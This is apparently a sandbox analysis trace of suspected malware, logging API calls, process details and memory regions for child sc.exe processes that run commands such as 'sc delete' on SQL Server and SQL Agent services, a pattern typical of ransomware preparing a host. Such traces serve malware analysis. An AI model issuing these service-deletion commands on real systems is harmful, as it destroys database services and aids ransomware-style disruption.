_wcsicmp (_String1="delete", _String2="lock") returned -8 [0078.019] _wcsicmp (_String1="delete", _String2="delete") returned 0 [0078.019] ResolveDelayLoadedAPI () returned 0x7ffc02114740 [0078.020] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x9b64e18a90 [0078.025] OpenServiceW (hSCManager=0x9b64e18a90, lpServiceName="SQLAgent$PROGID", dwDesiredAccess=0x10000) returned 0x0 [0078.025] GetLastError () returned 0x424 [0078.025] _ultow (in: _Dest=0x424, _Radix=1692072696 | out: _Dest=0x424) returned="1060" [0078.025] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x424, dwLanguageId=0x0, lpBuffer=0x7ff67ae41640, nSize=0x400, Arguments=0x0 | out: lpBuffer="The specified service does not exist as an installed service.\r\n") returned 0x3f [0078.026] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0x9b64dafab0, nSize=0x2, Arguments=0x9b64dafae0 | out: lpBuffer="顐擡\x9b") returned 0x62 [0078.027] GetFileType (hFile=0x24) returned 0x2 [0078.027] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x9b64dafa60 | out: lpMode=0x9b64dafa60) returned 1 [0078.072] WriteConsoleW (in: hConsoleOutput=0x24, lpBuffer=0x9b64e19850*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0x9b64dafa58, lpReserved=0x0 | out: lpBuffer=0x9b64e19850*, lpNumberOfCharsWritten=0x9b64dafa58*=0x62) returned 1 [0078.072] LocalFree (hMem=0x9b64e19850) returned 0x0 [0078.072] LocalFree (hMem=0x0) returned 0x0 [0078.072] CloseServiceHandle (hSCObject=0x9b64e18a90) returned 1 [0078.072] LocalFree (hMem=0x0) returned 0x0 [0078.072] exit (_Code=1060) Thread: id = 335 os_tid = 0x12e8 Process: id = "49" image_name = "sc.exe" filename = "c:\\windows\\system32\\sc.exe" page_root = "0xee71000" os_pid = "0xd5c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb14" cmd_line = "sc delete \"SQLAgent$WOLTERSKLUWER\"" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1140 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1141 start_va = 0x84bad10000 end_va = 0x84bad2ffff entry_point = 0x0 region_type = private name = "private_0x00000084bad10000" filename = "" Region: id = 1142 start_va = 0x84bad30000 end_va = 0x84bad43fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084bad30000" filename = "" Region: id = 1143 start_va = 0x84bad50000 end_va = 0x84badcffff entry_point = 0x0 region_type = private name = "private_0x00000084bad50000" filename = "" Region: id = 1144 start_va = 0x84badd0000 end_va = 0x84badd3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084badd0000" filename = "" Region: id = 1145 start_va = 0x84bade0000 end_va = 0x84bade0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084bade0000" filename = "" Region: id = 1146 start_va = 0x84badf0000 end_va = 0x84badf1fff entry_point = 0x0 region_type = private name = "private_0x00000084badf0000" filename = "" Region: id = 1147 start_va = 0x7df5ff860000 end_va = 0x7ff5ff85ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff860000" filename = "" Region: id = 1148 start_va = 0x7ff67a370000 end_va = 0x7ff67a392fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff67a370000" filename = "" Region: id = 1149 start_va = 0x7ff67a39d000 end_va = 0x7ff67a39efff entry_point = 0x0 region_type = private name = "private_0x00007ff67a39d000" filename = "" Region: id = 1150 start_va = 0x7ff67a39f000 end_va = 0x7ff67a39ffff entry_point = 0x0 region_type = private name = "private_0x00007ff67a39f000" filename = "" Region: id = 1151 start_va = 0x7ff67ae30000 end_va = 0x7ff67ae45fff entry_point = 0x7ff67ae30000 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\System32\\sc.exe" (normalized: "c:\\windows\\system32\\sc.exe") Region: id = 1152 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1672 start_va = 0x84bafb0000 end_va = 0x84bb0affff entry_point = 0x0 region_type = private name = "private_0x00000084bafb0000" filename = "" Region: id = 1673 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1674 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 4966 start_va = 0x84bad10000 end_va = 0x84bad1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084bad10000" filename = "" Region: id = 4967 start_va = 0x84bad20000 end_va = 0x84bad26fff entry_point = 0x0 region_type = private name = "private_0x00000084bad20000" filename = "" Region: id = 4968 start_va = 0x84bae00000 end_va = 0x84baebdfff entry_point = 0x84bae00000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4969 start_va = 0x84baec0000 end_va = 0x84baf3ffff entry_point = 0x0 region_type = private name = "private_0x00000084baec0000" filename = "" Region: id = 4970 start_va = 0x84bb150000 end_va = 0x84bb15ffff entry_point = 0x0 region_type = private name = "private_0x00000084bb150000" filename = "" Region: id = 4971 start_va = 0x7ff67a270000 end_va = 0x7ff67a36ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff67a270000" filename = "" Region: id = 4972 start_va = 0x7ff67a39b000 end_va = 0x7ff67a39cfff entry_point = 0x0 region_type = private name = "private_0x00007ff67a39b000" filename = "" Region: id = 4973 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 4974 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 4981 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 4982 start_va = 0x84baf40000 end_va = 0x84baf46fff entry_point = 0x0 region_type = private name = "private_0x00000084baf40000" filename = "" Region: id = 4983 start_va = 0x84bb160000 end_va = 0x84bb23efff entry_point = 0x84bb160000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 4984 start_va = 0x84baf50000 end_va = 0x84baf61fff entry_point = 0x84baf50000 region_type = mapped_file name = "sc.exe.mui" filename = "\\Windows\\System32\\en-US\\sc.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\sc.exe.mui") Thread: id = 77 os_tid = 0xd60 [0074.132] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff67ae30000 [0074.132] __set_app_type (_Type=0x1) [0074.132] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff67ae31f00) returned 0x0 [0074.132] __wgetmainargs (in: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038, _DoWildCard=0, _StartInfo=0x7ff67ae41044 | out: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038) returned 0 [0074.132] SetThreadUILanguage (LangId=0x0) returned 0x409 [0074.257] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0074.257] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0074.257] wcsncmp (_String1="de", _String2="\\\\", _MaxCount=0x2) returned 8 [0074.257] _wcsicmp (_String1="delete", _String2="query") returned -13 [0074.257] _wcsicmp (_String1="delete", _String2="queryex") returned -13 [0074.257] _wcsicmp (_String1="delete", _String2="start") returned -15 [0074.257] _wcsicmp (_String1="delete", _String2="pause") returned -12 [0074.257] _wcsicmp (_String1="delete", _String2="interrogate") returned -5 [0074.257] _wcsicmp (_String1="delete", _String2="control") returned 1 [0074.257] _wcsicmp (_String1="delete", _String2="continue") returned 1 [0074.257] _wcsicmp (_String1="delete", _String2="stop") returned -15 [0074.257] _wcsicmp (_String1="delete", _String2="config") returned 1 [0074.257] _wcsicmp (_String1="delete", _String2="description") returned -7 [0074.257] _wcsicmp (_String1="delete", _String2="failure") returned -2 [0074.257] _wcsicmp (_String1="delete", _String2="privs") returned -12 [0074.257] _wcsicmp (_String1="delete", _String2="failureflag") returned -2 [0074.257] _wcsicmp (_String1="delete", _String2="triggerinfo") returned -16 [0074.257] _wcsicmp (_String1="delete", _String2="sidtype") returned -15 [0074.257] _wcsicmp (_String1="delete", _String2="managedaccount") returned -9 [0074.257] _wcsicmp (_String1="delete", _String2="preferrednode") returned -12 [0074.257] _wcsicmp (_String1="delete", _String2="qc") returned -13 [0074.257] _wcsicmp (_String1="delete", _String2="qdescription") returned -13 [0074.257] _wcsicmp (_String1="delete", _String2="qfailure") returned -13 [0074.257] _wcsicmp (_String1="delete", _String2="qprivs") returned -13 [0074.257] _wcsicmp (_String1="delete", _String2="qfailureflag") returned -13 [0074.257] _wcsicmp (_String1="delete", _String2="qtriggerinfo") returned -13 [0074.257] _wcsicmp (_String1="delete", _String2="qsidtype") returned -13 [0074.257] _wcsicmp (_String1="delete", _String2="showsid") returned -15 [0074.257] _wcsicmp (_String1="delete", _String2="qpreferrednode") returned -13 [0074.257] _wcsicmp (_String1="delete", _String2="qmanagedaccount") returned -13 [0074.257] _wcsicmp (_String1="delete", _String2="querylock") returned -13 [0074.258] _wcsicmp (_String1="delete", _String2="qprotection") returned -13 [0074.258] _wcsicmp (_String1="delete", _String2="lock") returned -8 [0074.258] _wcsicmp (_String1="delete", _String2="delete") returned 0 [0074.258] ResolveDelayLoadedAPI () returned 0x7ffc02114740 [0074.259] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x84bafb8a10 [0074.267] OpenServiceW (hSCManager=0x84bafb8a10, lpServiceName="SQLAgent$WOLTERSKLUWER", dwDesiredAccess=0x10000) returned 0x0 [0074.268] GetLastError () returned 0x424 [0074.268] _ultow (in: _Dest=0x424, _Radix=-1159922360 | out: _Dest=0x424) returned="1060" [0074.268] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x424, dwLanguageId=0x0, lpBuffer=0x7ff67ae41640, nSize=0x400, Arguments=0x0 | out: lpBuffer="The specified service does not exist as an installed service.\r\n") returned 0x3f [0074.269] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0x84badcfd00, nSize=0x2, Arguments=0x84badcfd30 | out: lpBuffer="顠뫻\x84") returned 0x62 [0074.270] GetFileType (hFile=0x24) returned 0x2 [0074.270] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x84badcfcb0 | out: lpMode=0x84badcfcb0) returned 1 [0074.316] WriteConsoleW (in: hConsoleOutput=0x24, lpBuffer=0x84bafb9860*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0x84badcfca8, lpReserved=0x0 | out: lpBuffer=0x84bafb9860*, lpNumberOfCharsWritten=0x84badcfca8*=0x62) returned 1 [0074.317] LocalFree (hMem=0x84bafb9860) returned 0x0 [0074.317] LocalFree (hMem=0x0) returned 0x0 [0074.317] CloseServiceHandle (hSCObject=0x84bafb8a10) returned 1 [0074.317] LocalFree (hMem=0x0) returned 0x0 [0074.317] exit (_Code=1060) Thread: id = 319 os_tid = 0x1230 Process: id = "50" image_name = "sc.exe" filename = "c:\\windows\\system32\\sc.exe" page_root = "0xeef6000" os_pid = "0xd64" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb14" cmd_line = "sc delete \"MSSQLFDLauncher$OPTIMA\"" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1153 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1154 start_va = 0x5ad7090000 end_va = 0x5ad70affff entry_point = 0x0 region_type = private name = "private_0x0000005ad7090000" filename = "" Region: id = 1155 start_va = 0x5ad70b0000 end_va = 0x5ad70c3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005ad70b0000" filename = "" Region: id = 1156 start_va = 0x5ad70d0000 end_va = 0x5ad714ffff entry_point = 0x0 region_type = private name = "private_0x0000005ad70d0000" filename = "" Region: id = 1157 start_va = 0x5ad7150000 end_va = 0x5ad7153fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005ad7150000" filename = "" Region: id = 1158 start_va = 0x5ad7160000 end_va = 0x5ad7160fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005ad7160000" filename = "" Region: id = 1159 start_va = 0x5ad7170000 end_va = 0x5ad7171fff entry_point = 0x0 region_type = private name = "private_0x0000005ad7170000" filename = "" Region: id = 1160 start_va = 0x7df5ff160000 end_va = 0x7ff5ff15ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff160000" filename = "" Region: id = 1161 start_va = 0x7ff67ad90000 end_va = 0x7ff67adb2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff67ad90000" filename = "" Region: id = 1162 start_va = 0x7ff67adb6000 end_va = 0x7ff67adb6fff entry_point = 0x0 region_type = private name = "private_0x00007ff67adb6000" filename = "" Region: id = 1163 start_va = 0x7ff67adbe000 end_va = 0x7ff67adbffff entry_point = 0x0 region_type = private name = "private_0x00007ff67adbe000" filename = "" Region: id = 1164 start_va = 0x7ff67ae30000 end_va = 0x7ff67ae45fff entry_point = 0x7ff67ae30000 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\System32\\sc.exe" (normalized: "c:\\windows\\system32\\sc.exe") Region: id = 1165 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1675 start_va = 0x5ad7200000 end_va = 0x5ad72fffff entry_point = 0x0 region_type = private name = "private_0x0000005ad7200000" filename = "" Region: id = 1676 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1677 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5109 start_va = 0x5ad7090000 end_va = 0x5ad709ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005ad7090000" filename = "" Region: id = 5110 start_va = 0x5ad70a0000 end_va = 0x5ad70a6fff entry_point = 0x0 region_type = private name = "private_0x0000005ad70a0000" filename = "" Region: id = 5111 start_va = 0x5ad7180000 end_va = 0x5ad71fffff entry_point = 0x0 region_type = private name = "private_0x0000005ad7180000" filename = "" Region: id = 5112 start_va = 0x5ad7300000 end_va = 0x5ad73bdfff entry_point = 0x5ad7300000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5113 start_va = 0x5ad7520000 end_va = 0x5ad752ffff entry_point = 0x0 region_type = private name = "private_0x0000005ad7520000" filename = "" Region: id = 5114 start_va = 0x7ff67ac90000 end_va = 0x7ff67ad8ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff67ac90000" filename = "" Region: id = 5115 start_va = 0x7ff67adbc000 end_va = 0x7ff67adbdfff entry_point = 0x0 region_type = private name = "private_0x00007ff67adbc000" filename = "" Region: id = 5116 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 5117 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 5124 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 5125 start_va = 0x5ad73c0000 end_va = 0x5ad73c6fff entry_point = 0x0 region_type = private name = "private_0x0000005ad73c0000" filename = "" Region: id = 5126 start_va = 0x5ad73d0000 end_va = 0x5ad74aefff entry_point = 0x5ad73d0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 5127 start_va = 0x5ad74b0000 end_va = 0x5ad74c1fff entry_point = 0x5ad74b0000 region_type = mapped_file name = "sc.exe.mui" filename = "\\Windows\\System32\\en-US\\sc.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\sc.exe.mui") Thread: id = 78 os_tid = 0xd68 [0076.073] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff67ae30000 [0076.073] __set_app_type (_Type=0x1) [0076.073] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff67ae31f00) returned 0x0 [0076.073] __wgetmainargs (in: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038, _DoWildCard=0, _StartInfo=0x7ff67ae41044 | out: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038) returned 0 [0076.073] SetThreadUILanguage (LangId=0x0) returned 0x409 [0076.158] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0076.158] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0076.158] wcsncmp (_String1="de", _String2="\\\\", _MaxCount=0x2) returned 8 [0076.158] _wcsicmp (_String1="delete", _String2="query") returned -13 [0076.158] _wcsicmp (_String1="delete", _String2="queryex") returned -13 [0076.158] _wcsicmp (_String1="delete", _String2="start") returned -15 [0076.158] _wcsicmp (_String1="delete", _String2="pause") returned -12 [0076.158] _wcsicmp (_String1="delete", _String2="interrogate") returned -5 [0076.158] _wcsicmp (_String1="delete", _String2="control") returned 1 [0076.158] _wcsicmp (_String1="delete", _String2="continue") returned 1 [0076.158] _wcsicmp (_String1="delete", _String2="stop") returned -15 [0076.158] _wcsicmp (_String1="delete", _String2="config") returned 1 [0076.158] _wcsicmp (_String1="delete", _String2="description") returned -7 [0076.158] _wcsicmp (_String1="delete", _String2="failure") returned -2 [0076.158] _wcsicmp (_String1="delete", _String2="privs") returned -12 [0076.158] _wcsicmp (_String1="delete", _String2="failureflag") returned -2 [0076.158] _wcsicmp (_String1="delete", _String2="triggerinfo") returned -16 [0076.158] _wcsicmp (_String1="delete", _String2="sidtype") returned -15 [0076.158] _wcsicmp (_String1="delete", _String2="managedaccount") returned -9 [0076.158] _wcsicmp (_String1="delete", _String2="preferrednode") returned -12 [0076.158] _wcsicmp (_String1="delete", _String2="qc") returned -13 [0076.158] _wcsicmp (_String1="delete", _String2="qdescription") returned -13 [0076.158] _wcsicmp (_String1="delete", _String2="qfailure") returned -13 [0076.159] _wcsicmp (_String1="delete", _String2="qprivs") returned -13 [0076.159] _wcsicmp (_String1="delete", _String2="qfailureflag") returned -13 [0076.159] _wcsicmp (_String1="delete", _String2="qtriggerinfo") returned -13 [0076.159] _wcsicmp (_String1="delete", _String2="qsidtype") returned -13 [0076.159] _wcsicmp (_String1="delete", _String2="showsid") returned -15 [0076.159] _wcsicmp (_String1="delete", _String2="qpreferrednode") returned -13 [0076.159] _wcsicmp (_String1="delete", _String2="qmanagedaccount") returned -13 [0076.171] _wcsicmp (_String1="delete", _String2="querylock") returned -13 [0076.171] _wcsicmp (_String1="delete", _String2="qprotection") returned -13 [0076.171] _wcsicmp (_String1="delete", _String2="lock") returned -8 [0076.171] _wcsicmp (_String1="delete", _String2="delete") returned 0 [0076.171] ResolveDelayLoadedAPI () returned 0x7ffc02114740 [0076.172] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x5ad7208980 [0076.177] OpenServiceW (hSCManager=0x5ad7208980, lpServiceName="MSSQLFDLauncher$OPTIMA", dwDesiredAccess=0x10000) returned 0x0 [0076.177] GetLastError () returned 0x424 [0076.177] _ultow (in: _Dest=0x424, _Radix=-686491368 | out: _Dest=0x424) returned="1060" [0076.177] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x424, dwLanguageId=0x0, lpBuffer=0x7ff67ae41640, nSize=0x400, Arguments=0x0 | out: lpBuffer="The specified service does not exist as an installed service.\r\n") returned 0x3f [0076.178] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0x5ad714f8d0, nSize=0x2, Arguments=0x5ad714f900 | out: lpBuffer="顠휠Z") returned 0x62 [0076.178] GetFileType (hFile=0x24) returned 0x2 [0076.178] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x5ad714f880 | out: lpMode=0x5ad714f880) returned 1 [0076.226] WriteConsoleW (in: hConsoleOutput=0x24, lpBuffer=0x5ad7209860*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0x5ad714f878, lpReserved=0x0 | out: lpBuffer=0x5ad7209860*, lpNumberOfCharsWritten=0x5ad714f878*=0x62) returned 1 [0076.226] LocalFree (hMem=0x5ad7209860) returned 0x0 [0076.226] LocalFree (hMem=0x0) returned 0x0 [0076.226] CloseServiceHandle (hSCObject=0x5ad7208980) returned 1 [0076.227] LocalFree (hMem=0x0) returned 0x0 [0076.227] exit (_Code=1060) Thread: id = 324 os_tid = 0x1258 Process: id = "51" image_name = "sc.exe" filename = "c:\\windows\\system32\\sc.exe" page_root = "0xeefb000" os_pid = "0xd6c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb14" cmd_line = "sc delete \"MSSQL$OPTIMA\"" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1166 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1167 start_va = 0xc886ee0000 end_va = 0xc886efffff entry_point = 0x0 region_type = private name = "private_0x000000c886ee0000" filename = "" Region: id = 1168 start_va = 0xc886f00000 end_va = 0xc886f13fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c886f00000" filename = "" Region: id = 1169 start_va = 0xc886f20000 end_va = 0xc886f9ffff entry_point = 0x0 region_type = private name = "private_0x000000c886f20000" filename = "" Region: id = 1170 start_va = 0xc886fa0000 end_va = 0xc886fa3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c886fa0000" filename = "" Region: id = 1171 start_va = 0xc886fb0000 end_va = 0xc886fb0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c886fb0000" filename = "" Region: id = 1172 start_va = 0xc886fc0000 end_va = 0xc886fc1fff entry_point = 0x0 region_type = private name = "private_0x000000c886fc0000" filename = "" Region: id = 1173 start_va = 0x7df5ffdb0000 end_va = 0x7ff5ffdaffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffdb0000" filename = "" Region: id = 1174 start_va = 0x7ff67a100000 end_va = 0x7ff67a122fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff67a100000" filename = "" Region: id = 1175 start_va = 0x7ff67a12d000 end_va = 0x7ff67a12efff entry_point = 0x0 region_type = private name = "private_0x00007ff67a12d000" filename = "" Region: id = 1176 start_va = 0x7ff67a12f000 end_va = 0x7ff67a12ffff entry_point = 0x0 region_type = private name = "private_0x00007ff67a12f000" filename = "" Region: id = 1177 start_va = 0x7ff67ae30000 end_va = 0x7ff67ae45fff entry_point = 0x7ff67ae30000 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\System32\\sc.exe" (normalized: "c:\\windows\\system32\\sc.exe") Region: id = 1178 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1678 start_va = 0xc887120000 end_va = 0xc88721ffff entry_point = 0x0 region_type = private name = "private_0x000000c887120000" filename = "" Region: id = 1679 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1680 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5251 start_va = 0xc886ee0000 end_va = 0xc886eeffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c886ee0000" filename = "" Region: id = 5252 start_va = 0xc886ef0000 end_va = 0xc886ef6fff entry_point = 0x0 region_type = private name = "private_0x000000c886ef0000" filename = "" Region: id = 5253 start_va = 0xc886fd0000 end_va = 0xc88708dfff entry_point = 0xc886fd0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5254 start_va = 0xc887090000 end_va = 0xc88710ffff entry_point = 0x0 region_type = private name = "private_0x000000c887090000" filename = "" Region: id = 5255 start_va = 0xc887250000 end_va = 0xc88725ffff entry_point = 0x0 region_type = private name = "private_0x000000c887250000" filename = "" Region: id = 5256 start_va = 0x7ff67a000000 end_va = 0x7ff67a0fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff67a000000" filename = "" Region: id = 5257 start_va = 0x7ff67a12b000 end_va = 0x7ff67a12cfff entry_point = 0x0 region_type = private name = "private_0x00007ff67a12b000" filename = "" Region: id = 5258 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 